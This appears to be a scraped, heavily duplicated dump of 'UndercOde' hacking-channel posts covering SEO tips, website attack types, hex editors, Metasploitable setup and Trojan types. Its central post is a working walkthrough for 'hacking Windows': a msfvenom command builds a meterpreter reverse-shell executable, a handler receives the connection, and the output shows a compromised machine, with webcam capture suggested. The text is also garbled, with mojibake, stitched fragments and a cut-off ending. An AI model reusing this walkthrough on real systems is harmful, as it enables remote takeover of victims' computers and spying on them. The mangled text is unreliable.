β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Increase tRaffic on your site ??
instagram.com/UndercOdeTestingCompaNY
π¦π »π ΄π π πππ °οΈππ:
1) Expand the semantic core
Do not focus only on high-frequency queries. Most sites, especially those that are starting to compete with the leaders of their niche, receive most of the traffic from medium and low frequency queries. Think over the structure of the site in advance and start working with texts on the principle of βone key = one articleβ.
2) Select keys that are relevant to the interests of the target audience
For example, you sell plastic windows. And two queries hit your kernel. The first: "second-hand plastic windows" and the second "order repair of plastic windows." What do you think, which one to leave so that a warm potential customer is ready to make an order?
How to increase traffic to the site using content marketing?
3) Blog
Publish articles that will be not only interesting, but also easy to read, choose a readable font, highlight subheadings, separate text with paragraphs, insert quotes and insets.
4) A good blog - a regular blog
The optimal frequency of publications is twice a week. Sometimes the results have to wait longer than one to two months. The main thing is not to give up and not to slow down. Blogging requires a solid investment of time and effort. Accept this fact and your efforts are guaranteed to pay off.
5) Observe the release time of materials
Over time, the blog will have a permanent audience. And itβs very good if she has the habit of regularly reading new materials. For example, at 16.00 on Wednesdays and Fridays.
Method number 6 Release materials unique in meaning
This is the key to the popularity of your blog. Think about how many people want to read the article βHow to choose a window installation company?β If 133 companies have already written it. Maybe it makes sense to spend a little more time and write an article on the topic: "How to convert two-chamber plastic windows into energy-efficient." With each new text, add some unique, valuable information to the Internet.
7) Create viral content
Detailed cases, various cheat sheets, infographics, check lists and article lists with numbers in the heading work great. For example, pay attention to the title of this article.
8) Follow the rules for writing articles
Must have: a powerful, attractive title, a must-have lead with intrigue, high-quality pictures with up-to-date signatures and insets where important facts should be highlighted.
9 ) cause an emotional response
Blogging about plastic windows? Explore your audience. Find out what problems people face. Believe me, they are not only interested in quality and timely delivery. There are problems on the topic of the day: loose fittings, foggy glass or mold on the slopes. Write how to get rid of one of these problems and look at the reaction of the blog readers.
10) Publish ratings
In the case of windows, the theme may be: βTOP-5 manufacturers of energy-efficient double-glazed windows according to the version of your site.β If you are selling products of the same brand, TOP-5 types of windows for apartments in noisy areas. Even if a potential buyer lives in a relatively quiet area, an article with this headline will definitely interest him.
11) Work with experts
The expertβs unique opinion in the article adds value to the content. A full-fledged interview on a relevant topic often leads a record number of readers to the site.
12 ) Make a selection of popular posts
Select only bomb materials that have proven themselves in their native resources. Add some explanatory comments. Reposts and likes will raise the siteβs behavioral indicators.
13) Post answers to interesting posts
Find a post or article that sparked a heated discussion in the comments. Write your point of view on the question, and try to make the author of the post notice your answer.
14) Research the market and publish the resultant
π¦How Increase tRaffic on your site ??
instagram.com/UndercOdeTestingCompaNY
π¦π »π ΄π π πππ °οΈππ:
1) Expand the semantic core
Do not focus only on high-frequency queries. Most sites, especially those that are starting to compete with the leaders of their niche, receive most of the traffic from medium and low frequency queries. Think over the structure of the site in advance and start working with texts on the principle of βone key = one articleβ.
2) Select keys that are relevant to the interests of the target audience
For example, you sell plastic windows. And two queries hit your kernel. The first: "second-hand plastic windows" and the second "order repair of plastic windows." What do you think, which one to leave so that a warm potential customer is ready to make an order?
How to increase traffic to the site using content marketing?
3) Blog
Publish articles that will be not only interesting, but also easy to read, choose a readable font, highlight subheadings, separate text with paragraphs, insert quotes and insets.
4) A good blog - a regular blog
The optimal frequency of publications is twice a week. Sometimes the results have to wait longer than one to two months. The main thing is not to give up and not to slow down. Blogging requires a solid investment of time and effort. Accept this fact and your efforts are guaranteed to pay off.
5) Observe the release time of materials
Over time, the blog will have a permanent audience. And itβs very good if she has the habit of regularly reading new materials. For example, at 16.00 on Wednesdays and Fridays.
Method number 6 Release materials unique in meaning
This is the key to the popularity of your blog. Think about how many people want to read the article βHow to choose a window installation company?β If 133 companies have already written it. Maybe it makes sense to spend a little more time and write an article on the topic: "How to convert two-chamber plastic windows into energy-efficient." With each new text, add some unique, valuable information to the Internet.
7) Create viral content
Detailed cases, various cheat sheets, infographics, check lists and article lists with numbers in the heading work great. For example, pay attention to the title of this article.
8) Follow the rules for writing articles
Must have: a powerful, attractive title, a must-have lead with intrigue, high-quality pictures with up-to-date signatures and insets where important facts should be highlighted.
9 ) cause an emotional response
Blogging about plastic windows? Explore your audience. Find out what problems people face. Believe me, they are not only interested in quality and timely delivery. There are problems on the topic of the day: loose fittings, foggy glass or mold on the slopes. Write how to get rid of one of these problems and look at the reaction of the blog readers.
10) Publish ratings
In the case of windows, the theme may be: βTOP-5 manufacturers of energy-efficient double-glazed windows according to the version of your site.β If you are selling products of the same brand, TOP-5 types of windows for apartments in noisy areas. Even if a potential buyer lives in a relatively quiet area, an article with this headline will definitely interest him.
11) Work with experts
The expertβs unique opinion in the article adds value to the content. A full-fledged interview on a relevant topic often leads a record number of readers to the site.
12 ) Make a selection of popular posts
Select only bomb materials that have proven themselves in their native resources. Add some explanatory comments. Reposts and likes will raise the siteβs behavioral indicators.
13) Post answers to interesting posts
Find a post or article that sparked a heated discussion in the comments. Write your point of view on the question, and try to make the author of the post notice your answer.
14) Research the market and publish the resultant
Explore the market in affordable ways. Publish the results in white paper format - this is a small instruction book to solve a specific problem.
15) Publish different content
Instructions, lists, reviews, entertainment posts, FAQs, interviews, presentations, news, cases, collections of photos and videos, ratings, comparisons, podcasts. The more diverse, the better.
16) Learn competitors
See what content your niche leaders post. Make it better, more interesting than theirs. By the way, during such studies, original, worthwhile ideas often come to mind.
17) Expand the theme of the blog
For example, if you have a blog about plastic windows, write a few articles about warming slopes, choosing blinds, curtains, curtains or tell interesting life hacks about using a window sill. Just don't make additional themes dominant. Stick to your main blog profile.
18) Announce interesting publications
Find reputable sources in your niche and talk about the most interesting publications on your blog. Good news and popular posts on social networks stimulate traffic activity.
19) Use Google Alerts
Subscribe to inquiries relevant to your market segment. New publications with the specified key phrases will come automatically.
20) Run the forum
This is an effective way to lower your bounce rate and grow a community from the target audience relevant to your product or service.
21) Use guest posting
Just forget the βlinks for linksβ tactic. Your goal is to increase your reach. Otherwise, the sanctions of search algorithms are not far.
22) Answer the questions
Preferably in the services Mail.ru or "Questions and Answers" from Google. Be active if the question is about your topic. Help solve the problem and do it for free.
23) Comment
Blogs and forums relevant to the topic of your product or service are desirable. It is important to do this under the real name and photo (or logo).
24) Social aggregators
Try using Categoryoria or Flipboard. Save a lot of time searching for a news feed and increase the visual appeal of your content.
25) Collect reviews
Yes, customers rarely give out letters of thanks themselves and record video reviews even less often. But for a small free service or discount, almost every customer will reconsider their views on this issue.
Increase website traffic through social networks
26) Be everywhere
Official pages in all popular social media are a must have for any business or self-employed person who provides online services.
27) Arm yourself with photo content
Instagram and Pinterest will help increase sales of any visual goods from mobile phones to gardening equipment.
28) Business social networks
Stumbleupon and LinkedIn are the most popular, though only so far abroad. But each of them is capable of firing at RuNet at any time. Remember, the explosion of Instagram popularity didnβt reach our edges right away.
29) Full announcements
The material is published on your site. In the social network, you write a small introductory text, a seed, attach a photo, leave a link. And then a matter of technology.
30) Use the fruits of someone else's work
Usually no one opposes quotes or statistics with reference to the author or organization that conducted the study. This is a great way to add value to your content and increase your interest in publishing.
31) The best thing is to fix
Do you have a post that broke records on likes and reposts? Fasten it at the very top of the tape. This is a proven way to expand your reach.
32) CTA button on Facebook
The call to action button Call To Action is available absolutely free of charge and no ads are needed for this.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
15) Publish different content
Instructions, lists, reviews, entertainment posts, FAQs, interviews, presentations, news, cases, collections of photos and videos, ratings, comparisons, podcasts. The more diverse, the better.
16) Learn competitors
See what content your niche leaders post. Make it better, more interesting than theirs. By the way, during such studies, original, worthwhile ideas often come to mind.
17) Expand the theme of the blog
For example, if you have a blog about plastic windows, write a few articles about warming slopes, choosing blinds, curtains, curtains or tell interesting life hacks about using a window sill. Just don't make additional themes dominant. Stick to your main blog profile.
18) Announce interesting publications
Find reputable sources in your niche and talk about the most interesting publications on your blog. Good news and popular posts on social networks stimulate traffic activity.
19) Use Google Alerts
Subscribe to inquiries relevant to your market segment. New publications with the specified key phrases will come automatically.
20) Run the forum
This is an effective way to lower your bounce rate and grow a community from the target audience relevant to your product or service.
21) Use guest posting
Just forget the βlinks for linksβ tactic. Your goal is to increase your reach. Otherwise, the sanctions of search algorithms are not far.
22) Answer the questions
Preferably in the services Mail.ru or "Questions and Answers" from Google. Be active if the question is about your topic. Help solve the problem and do it for free.
23) Comment
Blogs and forums relevant to the topic of your product or service are desirable. It is important to do this under the real name and photo (or logo).
24) Social aggregators
Try using Categoryoria or Flipboard. Save a lot of time searching for a news feed and increase the visual appeal of your content.
25) Collect reviews
Yes, customers rarely give out letters of thanks themselves and record video reviews even less often. But for a small free service or discount, almost every customer will reconsider their views on this issue.
Increase website traffic through social networks
26) Be everywhere
Official pages in all popular social media are a must have for any business or self-employed person who provides online services.
27) Arm yourself with photo content
Instagram and Pinterest will help increase sales of any visual goods from mobile phones to gardening equipment.
28) Business social networks
Stumbleupon and LinkedIn are the most popular, though only so far abroad. But each of them is capable of firing at RuNet at any time. Remember, the explosion of Instagram popularity didnβt reach our edges right away.
29) Full announcements
The material is published on your site. In the social network, you write a small introductory text, a seed, attach a photo, leave a link. And then a matter of technology.
30) Use the fruits of someone else's work
Usually no one opposes quotes or statistics with reference to the author or organization that conducted the study. This is a great way to add value to your content and increase your interest in publishing.
31) The best thing is to fix
Do you have a post that broke records on likes and reposts? Fasten it at the very top of the tape. This is a proven way to expand your reach.
32) CTA button on Facebook
The call to action button Call To Action is available absolutely free of charge and no ads are needed for this.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL Ways to hack sites 2019-2020
> Hacking sites becomes possible due to vulnerabilities in the site code, vulnerabilities and errors in the server software settings, as well as due to incorrect publication of the site on the server.
fb.com/UndercOdeTestingCompany
π¦VULNERABILITY OF THE SITE CODE
1) Injection:
The most formidable and common way of hacking a site are injections.
The possibility of successful exploitation of injections on the site in 99% of cases leads to cracking.
2) RCE - Remote code execution . Remote code execution on the server.
3)PHP Injection . Execution of arbitrary PHP code.
4) SQL injection . Embedding arbitrary code in an SQL query.
5) XP ath - injection . Embed arbitrary code in an XPath request.
π¦ Inclusions:
1) No less formidable and common way of hacking a site is inclusion.
The possibility of the successful operation of any inclusion on the site in 100% of cases will lead to its hacking.
> RFI Remote file include . Inclusion of a remote file.
> LFI - Local file include . Connect, execute, or read local files on the server.
> PHP include . Including a remote PHP file.
> Client attacks. Attacks on site administrators and visitors
A very popular way to hack a site is to attack the client in the victimβs browser
> One of the most practiced methods of hacking a site.
Due to the fact that more than 75% of all sites in the world are subject to client attacks (for example, XSS).
1) XSS attack . Cross Site SΡrΡrting - cross-site scripting.
2) CSRF attack . Cross Site Request Forgery - fake cross-site requests.
3) Phishing attack . Fishing - Phishing attack - fake site pages.
4) Incorrect publication of the site on the server. Publication errors.
5) Incorrect publication of the site on the server is a blatant mistake of the developers and administrators of the resource, often leading to its hacking.
6) Such errors that directly affect the security of the site are:
> Open directories with system files.
> Open access and the ability to execute system files interacting with a
> file system or databases.
>System archives, site backups that are in the public domain.
> Public dump database files.
> Open access to .svn or .git index files.
π¦Site administration errors:
1) Often, site administrators set short and primitive passwords for admins, like 123qwerty.
2) Such passwords are simply selected by attackers using special programs.
3) Negligence of site administrators with access to FTP and the administrative panel often leads to hacking of the site.
4) A Trojan sent by mail, supposedly forgotten by someone, but in fact, a virus-infected flash drive on a table by the admin site that was specially left by an attacker can lead to hacking.
π¦VULNERABILITY OF THE SERVER
1) Vulnerabilities in server software pose a huge danger to the sites hosted on them.
2) Outdated versions of server operating systems, as well as Nginx, Apache, PHP, MySQL, FTP and other software pose a threat to the siteβs security, as in most cases they are vulnerable to hacking and attacks.
In addition, there are special software solutions, exploits , through which hacks and attacks on the server occur.
I3) ncorrect server configuration can also open a "hole" or a loophole through which an attacker can hack.
Written bY UndercOde
π¦ don t clone our tutorials Without Permission To Prevent damage π¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ALL Ways to hack sites 2019-2020
> Hacking sites becomes possible due to vulnerabilities in the site code, vulnerabilities and errors in the server software settings, as well as due to incorrect publication of the site on the server.
fb.com/UndercOdeTestingCompany
π¦VULNERABILITY OF THE SITE CODE
1) Injection:
The most formidable and common way of hacking a site are injections.
The possibility of successful exploitation of injections on the site in 99% of cases leads to cracking.
2) RCE - Remote code execution . Remote code execution on the server.
3)PHP Injection . Execution of arbitrary PHP code.
4) SQL injection . Embedding arbitrary code in an SQL query.
5) XP ath - injection . Embed arbitrary code in an XPath request.
π¦ Inclusions:
1) No less formidable and common way of hacking a site is inclusion.
The possibility of the successful operation of any inclusion on the site in 100% of cases will lead to its hacking.
> RFI Remote file include . Inclusion of a remote file.
> LFI - Local file include . Connect, execute, or read local files on the server.
> PHP include . Including a remote PHP file.
> Client attacks. Attacks on site administrators and visitors
A very popular way to hack a site is to attack the client in the victimβs browser
> One of the most practiced methods of hacking a site.
Due to the fact that more than 75% of all sites in the world are subject to client attacks (for example, XSS).
1) XSS attack . Cross Site SΡrΡrting - cross-site scripting.
2) CSRF attack . Cross Site Request Forgery - fake cross-site requests.
3) Phishing attack . Fishing - Phishing attack - fake site pages.
4) Incorrect publication of the site on the server. Publication errors.
5) Incorrect publication of the site on the server is a blatant mistake of the developers and administrators of the resource, often leading to its hacking.
6) Such errors that directly affect the security of the site are:
> Open directories with system files.
> Open access and the ability to execute system files interacting with a
> file system or databases.
>System archives, site backups that are in the public domain.
> Public dump database files.
> Open access to .svn or .git index files.
π¦Site administration errors:
1) Often, site administrators set short and primitive passwords for admins, like 123qwerty.
2) Such passwords are simply selected by attackers using special programs.
3) Negligence of site administrators with access to FTP and the administrative panel often leads to hacking of the site.
4) A Trojan sent by mail, supposedly forgotten by someone, but in fact, a virus-infected flash drive on a table by the admin site that was specially left by an attacker can lead to hacking.
π¦VULNERABILITY OF THE SERVER
1) Vulnerabilities in server software pose a huge danger to the sites hosted on them.
2) Outdated versions of server operating systems, as well as Nginx, Apache, PHP, MySQL, FTP and other software pose a threat to the siteβs security, as in most cases they are vulnerable to hacking and attacks.
In addition, there are special software solutions, exploits , through which hacks and attacks on the server occur.
I3) ncorrect server configuration can also open a "hole" or a loophole through which an attacker can hack.
Written bY UndercOde
π¦ don t clone our tutorials Without Permission To Prevent damage π¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Quick Start Guide: How to Hack Windows with Kali Linux:
Tested Example by UndercOde :
t.me/undercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) Load creation
Payload is a program that looks like a virus or trojan that runs on a remote machine for the purpose of hacking. To create a payload, use the commands below, which will crack windows with Kali Linux .
root @ kali: / # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.189.128 LPORT = 4444 --format = exe -o /root/program.exe
No platform was selected, choosing Msf :: Module :: Platform :: Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root @ kali: / # ls -la /root/program.exe
-rw-r - r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
2) Run the mfsconsole command, which will launch the msf request.
root @ kali: # msfconsole
Β»...
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings - learn more on http://rapid7.com/metasploit
= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]
msf>
3) For use, we used the following details:
Port 4444: you can use of your choice
LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine uses using the Kali command.
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
Now give the following command in the msf line β use exploit / multi / handler β
msf> use exploit / multi / handler
msf exploit (handler)>
5) Then give the command βset payload windows / meterpreter / reverse_tcpβ in the following line:
msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
6) Now set the local IP and port using the lhost and lport commands, as shown below:
msf exploit (handler)> set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit (handler)> set lport 4444
lport => 4444
and finally use the command.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
7) Now you need to execute the βprogram.exeβ command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Quick Start Guide: How to Hack Windows with Kali Linux:
Tested Example by UndercOde :
t.me/undercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) Load creation
Payload is a program that looks like a virus or trojan that runs on a remote machine for the purpose of hacking. To create a payload, use the commands below, which will crack windows with Kali Linux .
root @ kali: / # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.189.128 LPORT = 4444 --format = exe -o /root/program.exe
No platform was selected, choosing Msf :: Module :: Platform :: Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root @ kali: / # ls -la /root/program.exe
-rw-r - r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
2) Run the mfsconsole command, which will launch the msf request.
root @ kali: # msfconsole
Β»...
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings - learn more on http://rapid7.com/metasploit
= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]
msf>
3) For use, we used the following details:
Port 4444: you can use of your choice
LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine uses using the Kali command.
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
Now give the following command in the msf line β use exploit / multi / handler β
msf> use exploit / multi / handler
msf exploit (handler)>
5) Then give the command βset payload windows / meterpreter / reverse_tcpβ in the following line:
msf exploit (handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
6) Now set the local IP and port using the lhost and lport commands, as shown below:
msf exploit (handler)> set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit (handler)> set lport 4444
lport => 4444
and finally use the command.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
7) Now you need to execute the βprogram.exeβ command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING OFFICIAL
π¦ WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE... @UndercodeTesting @DailyCve @iUndercode
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
7) Now you need to execute the βprogram.exeβ command on the Windows machine, as soon as it runs on the target machine, you can set the meterpreter session. Just type SysInfo to get the details of a hacked Windows machine.
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
msf exploit (handler)> exploit
[*] Started reverse TCP handler on 192.168.189.128-00-00444
[*] Starting the payload handler ...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128-00-00444 -> 192.168.189.1 UP3091) at 2017-01-26 00:51:31 +0000
meterpreter> sysinfo
Computer: MANN-PC
OS: Windows 7 (Build 7601, Service Pack 1).
Architecture: x64 (Current Process is WOW64)
System Language: en_IN
Domain: WORKGROUP
Logged On Users: 2
Meterpreter: x86 / win32
8) After you successfully receive the details, you can do more to use or get more detailed information using the β help β command , which will show all the options with which you can hack the system, for example, you can execute the webcam snap command β webcam_snap βis just like you can use many of the available options
E N J O Y BY U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Hex Editors sites or Apps by UndercOde
t.me/UndercOdeTesting
1) Hex Editor HexEdit.JS - Browser Hex Editing.
>https://hexed.it/
2) Hexinator is the world's best (proprietary, commercial) Hex editor.
>http://frhed.sourceforge.net/
3) Frhed is a binary editor for Windows.
> http://www.suavetech.com/0xed/0xed.html
4) 0xED is macOS's own hex editor that supports plugins for displaying custom data types.
> http://www.suavetech.com/0xed/0xed.html
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best Hex Editors sites or Apps by UndercOde
t.me/UndercOdeTesting
1) Hex Editor HexEdit.JS - Browser Hex Editing.
>https://hexed.it/
2) Hexinator is the world's best (proprietary, commercial) Hex editor.
>http://frhed.sourceforge.net/
3) Frhed is a binary editor for Windows.
> http://www.suavetech.com/0xed/0xed.html
4) 0xED is macOS's own hex editor that supports plugins for displaying custom data types.
> http://www.suavetech.com/0xed/0xed.html
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Configuring a nested virtual machine using a metasplitable image
Metaploitable Rapid7 Image by UndercOde
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) This image is specially configured with security vulnerabilities. This image is used for testing and troubleshooting. The following instructions show how to use a pre-created Metaspoitable image. However, if a newer version of the Metasploitable image is required, see https://github.com/rapid7/metasploitable3 .
> Go to https://information.rapid7.com/download-metasploitable-2017.html . Fill out the form to download the image and
2) click the Submit button .
3) Click the download button Metasploitable Now (download now ).
When downloading a zip file Extract the zip file and remember the location.
4) Convert the extracted VMDK file to a VHDX file so that it can be used with Hyper-V. To do this, open PowerShell with administrator rights and navigate to the folder in which the VMDK file is located and follow these instructions:
5) Download Microsoft Virtual Machine Converter and run the mvmc_setup file. MSI when prompted.
Import the PowerShell module. The default location in which the module is installed is C: \ Program Files \ Microsoft Virtual Machine Converter \Powerhell
6) Copy
Import-Module 'C:\Program Files\Microsoft Virtual Machine Converter\MvmcCmdlet.psd1' Β» written by Undercodetesting
7) Convert VMDK to VHD file that can be used by Hyper-V. This operation may take several minutes.
Powerhell
8) Copy
ConvertTo-MvmcVirtualHardDisk -SourceLiteralPath .\Metasploitable.vmdk -DestinationLiteralPath .\Metasploitable.vhdx -VhdType DynamicHardDisk -VhdFormat vhdx
9) Copy the generated metasplitable file. VHDX in K: \ users \ public \ documents \ hyper-in \ virtual Hard Disk.
10) Create a new Hyper-V virtual machine.
Open Hyper-V Manager .
11) Select action -> new virtual machine ->.
On the page before starting work New Virtual Machine Wizard , click Next
12) On the Specify Name and Location page, enter meta-location in the name field and click Next .
13)o n the Specify Generation page, accept the default values and click Next
14) On the memory allocation page , enter 512 MB for bootable memory and click Next
15) On the Network Settings page, leave the connection unconnected . You will configure the network adapter later.
16) tHEN On the Connect Virtual Hard Disk page, select Use an existing virtual hard disk . Navigate to the location of the metasplable file . VHDX created in the previous step, and then click Next
17) On the Completing the Create Virtual Machine Wizard page, click Finish .
18) After creating the virtual machine, select it in Hyper-V Manager. Do not turn on the computer yet.
19) Select action -> Options .
In the options dialog for metasplitable, select Add Hardware .
Select the legacy network adapter and click Add
20) The Metasploitable image is now ready for use. In Hyper-V Manager, select the action -> start , and then select the action -> Connect to
21) connect to the virtual machine. The default username is msfadmin , and the password is msfadmin .
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Configuring a nested virtual machine using a metasplitable image
Metaploitable Rapid7 Image by UndercOde
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) This image is specially configured with security vulnerabilities. This image is used for testing and troubleshooting. The following instructions show how to use a pre-created Metaspoitable image. However, if a newer version of the Metasploitable image is required, see https://github.com/rapid7/metasploitable3 .
> Go to https://information.rapid7.com/download-metasploitable-2017.html . Fill out the form to download the image and
2) click the Submit button .
3) Click the download button Metasploitable Now (download now ).
When downloading a zip file Extract the zip file and remember the location.
4) Convert the extracted VMDK file to a VHDX file so that it can be used with Hyper-V. To do this, open PowerShell with administrator rights and navigate to the folder in which the VMDK file is located and follow these instructions:
5) Download Microsoft Virtual Machine Converter and run the mvmc_setup file. MSI when prompted.
Import the PowerShell module. The default location in which the module is installed is C: \ Program Files \ Microsoft Virtual Machine Converter \Powerhell
6) Copy
Import-Module 'C:\Program Files\Microsoft Virtual Machine Converter\MvmcCmdlet.psd1' Β» written by Undercodetesting
7) Convert VMDK to VHD file that can be used by Hyper-V. This operation may take several minutes.
Powerhell
8) Copy
ConvertTo-MvmcVirtualHardDisk -SourceLiteralPath .\Metasploitable.vmdk -DestinationLiteralPath .\Metasploitable.vhdx -VhdType DynamicHardDisk -VhdFormat vhdx
9) Copy the generated metasplitable file. VHDX in K: \ users \ public \ documents \ hyper-in \ virtual Hard Disk.
10) Create a new Hyper-V virtual machine.
Open Hyper-V Manager .
11) Select action -> new virtual machine ->.
On the page before starting work New Virtual Machine Wizard , click Next
12) On the Specify Name and Location page, enter meta-location in the name field and click Next .
13)o n the Specify Generation page, accept the default values and click Next
14) On the memory allocation page , enter 512 MB for bootable memory and click Next
15) On the Network Settings page, leave the connection unconnected . You will configure the network adapter later.
16) tHEN On the Connect Virtual Hard Disk page, select Use an existing virtual hard disk . Navigate to the location of the metasplable file . VHDX created in the previous step, and then click Next
17) On the Completing the Create Virtual Machine Wizard page, click Finish .
18) After creating the virtual machine, select it in Hyper-V Manager. Do not turn on the computer yet.
19) Select action -> Options .
In the options dialog for metasplitable, select Add Hardware .
Select the legacy network adapter and click Add
20) The Metasploitable image is now ready for use. In Hyper-V Manager, select the action -> start , and then select the action -> Connect to
21) connect to the virtual machine. The default username is msfadmin , and the password is msfadmin .
Posted by U N D E R C O D E
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Common types of Trojan malware:
t.me/UndercOdeTesting
π¦π »π ΄π π πππ °οΈππ:
1) Backdoor Trojan
This Trojan can create a βbackdoorβ on your computer. It lets an attacker access your computer and control it. Your data can be downloaded by a third party and stolen. Or more malware can be uploaded to your device.
2) Distributed Denial of Service (DDoS) attack Trojan
This Trojan performs DDoS attacks. The idea is to take down a network by flooding it with traffic. That traffic comes from your infected computer and others.
3) Downloader Trojan
This Trojan targets your already-infected computer. It downloads and installs new versions of malicious programs. These can include Trojans and adware.
4) Fake AV Trojan
This Trojan behaves like antivirus software, but demands money from you to detect and remove threats, whether theyβre real or fake.
5) Game-thief Trojan
The losers here may be online gamers. This Trojan seeks to steal their account information.
6) Infostealer Trojan
As it sounds, this Trojan is after data on your infected computer.
7) Mailfinder Trojan
This Trojan seeks to steal the email addresses youβve accumulated on your device.
8) Ransom Trojan
This Trojan seeks a ransom to undo damage it has done to your computer. This can include blocking your data or impairing your computerβs performance.
9) Remote Access Trojan
This Trojan can give an attacker full control over your computer via a remote network connection. Its uses include stealing your information or spying on you.
10) Rootkit Trojan
A rootkit aims to hide or obscure an object on your infected computer. To extend the time a malicious program runs on your device.
11) SMS Trojan
